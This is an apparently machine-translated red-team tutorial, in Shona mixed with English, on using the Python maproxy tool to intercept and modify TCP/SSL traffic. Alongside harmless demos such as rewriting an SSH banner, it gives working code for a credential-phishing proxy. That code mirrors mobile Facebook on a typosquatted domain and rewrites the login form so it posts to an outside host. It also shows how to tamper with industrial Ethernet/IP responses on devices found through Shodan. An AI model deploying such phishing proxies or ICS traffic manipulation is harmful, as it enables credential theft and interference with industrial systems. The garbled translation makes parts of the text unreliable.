Kuturikirwa kwechinyorwa kwakagadzirirwa manheru ekutanga kwekosi
chirevo
Mhando dzakasiyana-siyana dzekuongorora kuchengetedza, kubva pakuyedzwa kwekupinda mukati uye Red Team mashandiro kusvika kubaya maIoT/ICS zvishandiso uye SCADA, zvinosanganisira kushanda nemabhinari network protocol, kureva, kubata nekugadzirisa data retiweki pakati pemutengi nechinangwa. Sniffing network traffic harisi basa rakaoma sezvo isu tine maturusi akaita seWireshark, Tcpdump kana Scapy, asi kugadziridzwa kunoratidzika kunge ibasa rinonyanya kushanda sezvo tichizoda kuve nerumwe rudzi rwekuti tiverenge network data, kuisefa, chinja. it on the fly and send it back to the target host in almost real time. Pamusoro pezvo, zvingave zvakanaka kana chishandiso chakadaro chaigona kungoshanda neakawanda anoenderana kubatanidza uye kuve customizable uchishandisa zvinyorwa.
Rimwe zuva ndakawana mudziyo unonzi
, zvinyorwa zvakakurumidza kundijekesera kuti maproxy
- chete zvandinoda. Iyi iri nyore, inogoneka uye inogadziriswa nyore TCP proxy. Ndakaedza chishandiso ichi pane akati wandei akaomarara maapplication, anosanganisira ICS zvishandiso (izvo zvinogadzira akawanda mapaketi) kuti ndione kana ichigona kubata akawanda akafanana anobatana, uye chishandiso chakaita nemazvo.
Ichi chinyorwa chinokuzivisa iwe kugadzirisa network data pane nhunzi uchishandisa maproxy
.
tsananguro
Tool maproxy
yakavakirwa paTornado, inozivikanwa uye yakakura asynchronous networking system muPython.
Kazhinji, inogona kushanda mune akati wandei modes:
TCP:TCP
- TCP yekubatanidza isina kunyorwa;TCP:SSL
иSSL:TCP
- ne-one-way encryption;SSL:SSL
- nzira mbiri encryption.
Inouya seraibhurari. Kuti utange nekukurumidza, unogona kushandisa mafaira emuenzaniso anoratidza huru
all.py
certificate.pem
logging_proxy.py
privatekey.pem
ssl2ssl.py
ssl2tcp.py
tcp2ssl.py
tcp2tcp.py
Nyaya 1 - nyore bidirectional proxy
Maererano ne tcp2tcp.py
:
#!/usr/bin/env python
import tornado.ioloop
import maproxy.proxyserver
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
tornado.ioloop.IOLoop.instance().start()
kubudikidza default ProxyServer()
inotora nharo mbiri - nzvimbo yekubatanidza uye chiteshi chengarava. server.listen()
inotora nharo imwe - chiteshi chekuteerera kune inouya yekubatanidza.
Kuita script:
# python tcp2tcp.py
Kuti tiite bvunzo, tichabatanidza kune yemuno SSH server kuburikidza neproxy script yedu, inoteerera 2222/tcp
port uye inobatanidza kune yakajairwa chiteshi 22/tcp
SSH maseva:
Iyo yekugamuchira banner inokuzivisa iwe kuti yedu muenzaniso script yakabudirira proxyed network traffic.
Mhosva 2 - kugadzirisa data
Imwe demo script logging_proxy.py
yakanakira kufambidzana netiweki data. Maonero ari mufaira anotsanangura nzira dzekirasi dzaunogona kushandura kuti uzadzise chinangwa chako:
Chinhu chinonyanya kufadza chiri pano:
on_c2p_done_read
- kubata data munzira kubva kumutengi kuenda kune server;on_p2s_done_read
- kudzoserwa shure.
Ngatiedze kushandura SSH banner iyo sevha inodzokera kumutengi:
[…]
def on_p2s_done_read(self,data):
data = data.replace("OpenSSH", "DumnySSH")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("localhost",22)
server.listen(2222)
[…]
Tora script:
Sezvauri kuona, mutengi akarasika nekuti zita reSSH server kwaari rakachinjirwa kuita «DumnySSH»
.
Nyaya 3 - nyore phishing peji rewebhu
Kune nzira dzisingaperi dzekushandisa chishandiso ichi. Ino nguva ngatitarisei pane chimwe chinhu chinoshanda kubva kuRed Team mashandiro edivi. Ngatitevedzerei peji yekumhara m.facebook.com
uye shandisa dura retsika ine typo nemaune, semuenzaniso, m.facebok.com
. Nezvinangwa zvekuratidzira, ngatingofungidzira kuti iyo domain yakanyoreswa nesu.
Isu tichagadzira isina kuvharirwa network yekubatanidza nevatiwisira proxy uye SSL Stream kune Facebook server (31.13.81.36
) Kuita kuti muenzaniso uyu ushande, tinofanirwa kutsiva iyo HTTP host musoro uye jekiseni rakakodzera zita remugamuchiri, uye isu tichadzimawo kudzvanya kwekupindura kuti tigone kuwana zviri mukati zviri nyore. Pakupedzisira isu tichatsiva iyo HTML fomu kuitira kuti magwaro ekupinda atumirwe kwatiri panzvimbo yemaseva eFacebook:
[…]
def on_c2p_done_read(self,data):
# replace Host header
data = data.replace("Host: m.facebok.com", "Host: m.facebook.com")
# disable compression
data = data.replace("gzip", "identity;q=0")
data = data.replace("deflate", "")
super(LoggingSession,self).on_c2p_done_read(data)
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
data = data.replace("action="/sn/login/", "action="https://redteam.pl/")
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("31.13.81.36",443, session_factory=LoggingSessionFactory(), server_ssl_options=True)
server.listen(80)
[…]
Muchidimbu:
Sezvauri kuona, isu takabudirira kukwanisa kutsiva yekutanga saiti.
Nyaya 4 - Porting Ethernet/IP
Ndanga ndichishanda nemidziyo yemaindasitiri uye software (ICS/SCADA) kwenguva yakati rebei, senge programmable controllers (PLC), I/O modules, madhiraivha, relays, ladder programming environments nezvimwe zvakawanda. Nyaya iyi ndeye vanoda zvinhu zvemaindasitiri. Kubira mhinduro dzakadai kunosanganisira kushingaira kutamba netiweki protocol. Mumuenzaniso unotevera, ndinoda kuratidza maitiro aungaita ICS/SCADA network traffic.
Kuti uite izvi, iwe uchada zvinotevera:
- Network sniffer, semuenzaniso, Wireshark;
- Ethernet/IP kana kungoti SIP mudziyo, unogona kuiwana uchishandisa Shodan sevhisi;
- Script yedu yakavakirwa pa
maproxy
.
Kutanga, ngatitarisei kuti yakajairwa chiziviso mhinduro kubva kuCIP (Common Industrial Protocol) inoita senge:
Kuzivikanwa kwemudziyo kunoitwa pachishandiswa Ethernet/IP protocol, inova vhezheni yakagadziridzwa yeindasitiri Ethernet protocol inoputira kutonga mapuroteni seCIP. Isu ticha shandura iyo yakavhenekerwa ID zita rinoonekwa mune iyo skrini "NI-IndComm yeEthernet" tichishandisa proxy script yedu. Tinogona kushandisa zvakare script logging_proxy.py
uye nenzira yakafanana shandura nzira yekirasi on_p2s_done_read
, nekuti tinoda kuti zita rakasiyana rekuzivikanwa rionekwe pamutengi.
Code:
[…]
def on_p2s_done_read(self,data):
# partial replacement of response
# Checking if we got List Identity message response
if data[26:28] == b'x0cx00':
print('Got response, replacing')
data = data[:63] + 'DUMMY31337'.encode('utf-8') + data[63+10:]
super(LoggingSession,self).on_p2s_done_read(data)
[…]
server = maproxy.proxyserver.ProxyServer("1.3.3.7",44818,session_factory=LoggingSessionFactory())
server.listen(44818)
[…]
Chaizvoizvo, takakumbira kuzivikanwa kwemudziyo kaviri, mhinduro yechipiri yaive yekutanga, uye yekutanga yakagadziridzwa panhunzi.
Uye yekupedzisira
Mukufunga kwangu maproxy
Chishandiso chiri nyore uye chiri nyore, icho chakanyorwa zvakare muPython, saka ndinotenda kuti iwewo unogona kubatsirwa nekuishandisa. Ehe, kune mamwe maturusi akaomesesa ekugadzirisa nekugadzirisa network data, asi ivo vanodawo kutariswa kwakawanda uye kazhinji vanogadzirwa kune imwe nyaya yekushandisa, semuenzaniso. maproxy
unogona kukurumidza kushandisa mazano ako ekubvunzurudza data yetiweki, sezvo zvinyorwa zvemuenzaniso zvakajeka.
Source: www.habr.com